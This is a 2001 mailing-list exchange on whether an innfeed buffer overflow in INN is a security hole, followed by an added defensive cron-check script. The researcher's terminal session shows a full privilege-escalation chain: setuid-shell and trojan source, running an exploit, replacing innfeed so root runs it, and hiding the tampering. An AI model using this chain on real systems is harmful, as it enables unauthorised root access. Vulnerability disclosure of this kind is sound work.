(not an) innfeed vulnerability
Enrique A. Sanchez Montellano
enrique.sanchez at defcom.com
Thu Apr 12 19:38:39 UTC 2001
Russ Allbery wrote:
> Well, I don't understand the point of your advisory, and yet again I would
> like to repeat that this does not constitute a security hole. Issuing a
> security advisory for it therefore doesn't make any sense.
But I think it is, and I shall explain within this email.
> I told you that if you found a security hole, we'd be happy to work with
> you on an advisory, but this still isn't a security hole.
>
> Thank you for the patch, though. It will be in the next release of INN,
> since it does fix a quality of implementation issue.
No Problem .. =)
> How can he then further upgrade his privileges? I don't believe that this
> is the case; please show me an example.
OK, here is the example. The only thing that is required is that root
runs innfeed as a cron job or manually, which is done by some
administrators ...
nahual at shell:~$ id
uid=1001(nahual) gid=100(users) groups=100(users),13(news)
nahual at shell:~$ cat mine.c
#include <stdio.h>
#include <unistd.h>
int main(void) {
setuid(0);
setgid(0);
execl("/bin/sh", "/bin/sh", NULL);
return 0;
}
nahual at shell:~$ cat trojan-innfeed.c
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
int main(void) {
system("chown root.root /tmp/mine");
system("chmod 4111 /tmp/mine");
return 0;
}
nahual at shell:~$ cp mine /tmp/
nahual at shell:~$ ls -al /tmp/mine
-rwxr-xr-x 1 nahual users 11869 Apr 12 21:20 /tmp/mine*
nahual at shell:~$ cp trojan-innfeed /tmp/
nahual at shell:~$ ./x-innfeed
[ + ] innfeed buffer overflow (passed to startinnfeed) [ + ]
------------------------------------------------------------
[ + ] Found by:
[ + ] Alex Hernandez (alex.hernandez at defcom.com)
[ + ] Enrique Sanchez (@defcom.com ... Yes is just @defcom.com)
[ + ] Defcom Labs @ Spain ....
[ + ] Coded by Enrique A. Sanchez Montellano (El Nahual)
[ + ] Using address 0xbffff9c4
[ + ] Starting exploitation ...
bash$ id
uid=9(news) gid=13(news) groups=100(users),13(news)
bash$ cd /usr/lib/news/bin/
bash$ cp innfeed innfeed2
bash$ chmod 777 innfeed
bash$ cp /tmp/trojan-innfeed innfeed
bash$ ls innfeed2
innfeed2
bash$ ls -l innfeed2
-r-xr-x--- 1 news news 213124 Apr 12 21:21 innfeed2
bash$ chmod 550 innfeed
bash$ ls -l innfeed
-r-xr-x--- 1 news news 11714 Apr 12 21:22 innfeed
bash$
--- NOW ROOT EXECUTES THIS ON A CRON OR SOMETHING LIKE THAT ---
root at shell:~# /usr/lib/news/bin/innfeed
root at shell:~#
--- The user logs in again ---
nahual at shell:~$ ls -al /tmp/mine
---s--x--x 1 root root 11869 Apr 12 21:20 /tmp/mine*
nahual at shell:~$ /tmp/mine
root at shell:~# id
uid=0(root) gid=0(root) groups=100(users),13(news)
root at shell:~#
----
From here, if the attacker then changes the binary back and sets it to
chmod 550, the administrator will not notice he has been hacked ...
>
> Furthermore, you can only get news UID if you already have news GID:
Yeah, but that is an escalation of privileges even if it's not root, as I
have explained before. It really doesn't have to go all the way to root
to be a security hole; it can be used as a trampoline to trojan or use
another exploit, if there was any other one.
> and there are innumerable other ways of getting news UID if you have news
> GID if you're running INN 2.2. If you're running INN 2.3, your exploit
> won't run unless you're *already* news UID, in which case the whole thing
> is an extremely complicated way of spawning a new shell with your existing
> privileges.
I'm calling startinnfeed. I have tried this with 2.3.1; startinnfeed is
4550, owner root, group news, so I can still call that instead of innfeed,
since it's news.news 500 in a secure manner. startinnfeed does a
setuid(news), and that is where I can then gain the news uid.
> I appreciate the work that you're trying to do here, but you need to make
> sure that you have all of your facts accurate.
That is true. As far as I have been exploiting this, it works; it's true
it is not an automatic root, but I still think it can be leveraged to gain
further access. Any ideas? As far as I can tell it is a security hole,
since you are able to gain a uid that is not yours.
Enrique A. Sanchez Montellano
Chief Technical Officer Defcom Spain
+(34) 91 3080175
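An added example, not part of this thread or of INN's own code: a POSIX sh pre-flight check that a root cron job could run before executing a news binary. It refuses to execute anything that root does not own, or that group or world can write, either directly or through its directory, which is exactly the condition the demonstration above depends on (innfeed owned news:news, replaced before root ran it). The function names are my own.

```shell
#!/bin/sh
# Added example (not from the original thread or from INN): refuse to run a
# binary as root if an unprivileged account could have replaced it.
# Hypothetical helper names: safe_cron_target, run_checked.

# Return 0 if the file is safe to execute as root, 1 (with a reason) otherwise.
safe_cron_target() {
    f=$1
    d=$(dirname -- "$f")
    # Symlinks and non-regular files are rejected outright.
    if [ ! -f "$f" ] || [ -L "$f" ]; then
        echo "unsafe: $f is not a regular file"; return 1
    fi
    # Owner must be root: any other owner can swap the binary at will,
    # which is what the news-uid shell did to innfeed above.
    if [ -z "$(find "$f" -prune -user root -print)" ]; then
        echo "unsafe: $f is not owned by root"; return 1
    fi
    # Neither the file nor its directory may be group- or world-writable
    # (-perm -020 = group write bit set, -perm -002 = other write bit set).
    for p in "$f" "$d"; do
        if [ -n "$(find "$p" -prune \( -perm -020 -o -perm -002 \) -print)" ]; then
            echo "unsafe: $p is group- or world-writable"; return 1
        fi
    done
    return 0
}

# Wrapper for root's crontab: run the command only if the check passes.
run_checked() {
    safe_cron_target "$1" || return 1
    "$@"
}
```

In the scenario above, `run_checked /usr/lib/news/bin/innfeed` would refuse because the binary is owned by news rather than root, so the trojaned copy never runs with uid 0.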